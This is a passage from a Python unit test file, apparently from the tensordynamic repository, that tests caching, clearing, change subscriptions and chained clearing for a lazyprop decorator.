clear_lazyprop_on_lazyprop_cleared, clear_lazyprop\n\n\nclass _PropClass(object):\n STATIC_VAL = None\n\n @lazyprop\n def lazyprop(self):\n return self.STATIC_VAL\n\n\nclass TestLazyprop(TestCase):\n def test_clear_all(self):\n prop_class = _PropClass()\n prop_class.STATIC_VAL = 1\n self.assertEquals(prop_class.lazyprop, 1)\n\n prop_class.STATIC_VAL = 2\n self.assertEquals(prop_class.lazyprop, 1)\n\n clear_all_lazyprops(prop_class)\n self.assertEquals(prop_class.lazyprop, 2)\n\n def test_subscribe_lazy_prop_change(self):\n prop_class = _PropClass()\n checker = []\n subscribe_to_lazy_prop(prop_class, 'lazyprop',\n lambda _: checker.append(1))\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(checker, [1])\n\n def test_unsubscribe_lazy_prop_change(self):\n prop_class = _PropClass()\n checker = []\n func = lambda _: checker.append(1)\n subscribe_to_lazy_prop(prop_class, 'lazyprop', func)\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(len(checker), 1)\n\n unsubscribe_from_lazy_prop(prop_class, 'lazyprop', func)\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(len(checker), 1)\n\n def test_clear_lazyprop_on_lazyprop_cleared(self):\n prop_class_1 = _PropClass()\n prop_class_2 = _PropClass()\n\n clear_lazyprop_on_lazyprop_cleared(prop_class_2, 'lazyprop',\n prop_class_1, 'lazyprop')\n\n prop_class_1.STATIC_VAL = 1\n prop_class_2.STATIC_VAL = 2\n\n self.assertEqual(prop_class_1.lazyprop, 1)\n self.assertEqual(prop_class_2.lazyprop, 2)\n\n prop_class_1.STATIC_VAL = 3\n prop_class_2.STATIC_VAL = 4\n\n clear_lazyprop(prop_class_1, 'lazyprop')\n\n 
self.assertEqual(prop_class_1.lazyprop, 3)\n self.assertEqual(prop_class_2.lazyprop, 4)","repo_name":"DanielSlater/tensordynamic","sub_path":"tests/test_lazyprop.py","file_name":"test_lazyprop.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"}